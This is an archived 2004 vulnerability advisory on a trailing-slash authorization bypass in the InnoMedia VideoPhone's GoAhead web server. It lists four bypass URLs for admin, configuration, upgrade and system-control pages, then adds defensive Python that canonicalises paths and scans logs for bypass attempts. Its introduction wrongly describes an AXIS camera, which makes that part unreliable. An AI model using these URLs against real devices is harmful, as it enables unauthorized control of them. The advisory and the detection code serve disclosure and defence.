InnoMedia VideoPhone Authorization Bypass

2004-03-01T00:00:00
ID SECURITYVULNS:DOC:5852
Type securityvulns
Reporter Securityvulns
Modified 2004-03-01T00:00:00

Description

Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
         GoAhead Ltd
         http://www.innomedia.com/
         http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

1) Introduction
2) Bugs
3) The Code

===============
1) Introduction
===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.

======
2) Bug
======

Browsing the server normally (http://<host>/) shows some information about the server. The server's menu appears on the left side and contains a few links to protected files that set up the server's settings/configuration. Requesting any of the menu's "protected" links, such as:

http://<host>/videophone_admindetail.asp

pops up a "Basic Authorization" request. This authorization can be easily bypassed by requesting the same file as a folder, i.e. with a trailing slash:

http://<host>/videophone_admindetail.asp/

===========
3) The Code
===========

http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
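The bug described in sections 2 and 3 belongs to a well-known class: the access check compares the request path exactly as the client sent it against a list of protected resources, while the file-serving layer later maps a variant of that path (the same name with a trailing slash) to the same file, so the variant never reaches the check. The following is an added example, written for this page and not code from the advisory, from InnoMedia or from the GoAhead web server: a model of the naive check beside a hardened version that canonicalises the path before the lookup, plus a small scanner that flags requests in a web log whose raw path misses the access list but whose canonical path hits it. The protected file names come from the advisory; the naive check is a model of the bug class rather than GoAhead's actual code, the log lines are constructed for the example, and lower-casing the path assumes a case-insensitive file system (as on the advisory's Windows platform).

```python
"""Canonicalise-before-authorise (added example; not code from the advisory,
InnoMedia or GoAhead). PROTECTED_PATHS come from the advisory; every request
and log line below is constructed for this example."""
import posixpath
import re
from urllib.parse import unquote

PROTECTED_PATHS = {
    "/videophone_admindetail.asp",
    "/videophone_syscfg.asp",
    "/videophone_upgrade.asp",
    "/videophone_sysctrl.asp",
}


def requires_auth_naive(request_path):
    """Vulnerable pattern (model of the bug class): exact match on the raw path."""
    return request_path in PROTECTED_PATHS


def canonicalize(request_path):
    """Reduce a request target to the path the file handler would actually open.

    Strips query and fragment, percent-decodes once, collapses '.', '..',
    duplicate slashes and any trailing slash, and lower-cases the result
    (assumption: a case-insensitive file system, as on the advisory's Windows
    platform). Splitting on '?' and '#' by hand rather than via urlsplit()
    avoids a leading '//' being parsed as a network location.
    """
    path = request_path.split("#", 1)[0].split("?", 1)[0]
    path = unquote(path)
    # Force exactly one leading slash; posixpath.normpath would keep a double one.
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()


def requires_auth_hardened(request_path):
    """Hardened pattern: authorise on the canonical path, not the raw one."""
    return canonicalize(request_path) in PROTECTED_PATHS


# Common Log Format, enough to pull out client address, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+$'
)


def find_bypass_attempts(log_lines):
    """Return (client, raw target) for requests the naive check would have let
    through although their canonical path is a protected resource."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than crash the scan
        target = m.group("target")
        if requires_auth_hardened(target) and not requires_auth_naive(target):
            hits.append((m.group("ip"), target))
    return hits


# Constructed sample log (not real traffic); 192.0.2.0/24 and 203.0.113.0/24
# are documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Dec/2003:10:00:01 +0000] "GET /index.asp HTTP/1.0" 200 512',
    '192.0.2.10 - - [25/Dec/2003:10:00:05 +0000] "GET /videophone_admindetail.asp HTTP/1.0" 401 0',
    '192.0.2.10 - - [25/Dec/2003:10:00:09 +0000] "GET /videophone_admindetail.asp/ HTTP/1.0" 200 4096',
    '203.0.113.7 - - [25/Dec/2003:11:30:00 +0000] "GET /videophone_sysctrl.asp/ HTTP/1.0" 200 1024',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, target in find_bypass_attempts(SAMPLE_LOG):
        print(f"possible ACL bypass from {ip}: {target}")
```

The design point is that authorisation must run on the same representation of the resource that the file handler uses; any transformation the server applies after the check (trailing-slash handling, dot-segment collapsing, percent-decoding, case folding) has to be applied before it as well, or the check can be sidestepped. The scanner gives a cheap retrospective check over existing access logs: a 200 on a protected resource reached through a non-canonical path is what the advisory's bypass looks like in the logs.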


Rafel Ivgi, The-Insider http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."